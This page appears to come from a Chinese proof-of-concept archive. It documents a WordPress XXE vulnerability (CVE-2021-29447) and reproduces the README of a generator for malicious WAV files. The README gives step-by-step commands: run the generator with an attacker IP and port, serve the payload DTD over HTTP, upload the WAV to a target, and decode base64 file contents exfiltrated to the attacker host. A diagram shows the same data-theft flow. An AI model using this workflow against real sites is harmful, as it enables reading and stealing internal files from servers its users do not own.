POC详情: ddc902ca7f0bdbd7c3f2f1b7f4b5ff617c175b08

来源
关联漏洞
标题: WordPress 代码问题漏洞 (CVE-2021-29447)
描述:WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 存在代码问题漏洞,攻击者可利用该漏洞在成功的XXE攻击中可以访问内部文件。
描述
A XXE payload generator 
介绍
# WAV iXML XXE Exploit Generator

Generates malicious WAV files that exploit XXE vulnerabilities in WordPress plugins parsing iXML metadata chunks (e.g., BookingPress < 1.0.11).

## Quick Start
```bash
# Generate exploit files
python3 expl.py -i 10.10.14.204 -p 9200

# Start HTTP server
python3 -m http.server 9200

# Upload exploit.wav to target
# Monitor logs for data exfiltration

# Decode exfiltrated data
echo "BASE64_STRING" | base64 -d
```

## Workflow
```
┌──────────┐    1. Upload     ┌──────────┐
│ Attacker │ ───exploit.wav──>│  Target  │
└──────────┘                   └──────────┘
     ▲                              │
     │                              │ 2. Parse XML
     │                              │
     │ 3. GET /xxe.dtd             │
     │<─────────────────────────────┘
     │
     │ 4. GET /?p=base64_data
     │<─────────────────────────────┐
     │                              │
     └─ Decode and read file        │
```

## Vulnerable Targets

- WordPress BookingPress Plugin < 1.0.11
- Any application parsing iXML chunks in WAV files without disabling external entities

## References

- [WPScan Vulnerability DB](https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5/)
- CVE: CVE-2021-29447
文件快照

[4.0K] /data/pocs/ddc902ca7f0bdbd7c3f2f1b7f4b5ff617c175b08 ├── [ 28K] expl.py └── [1.5K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。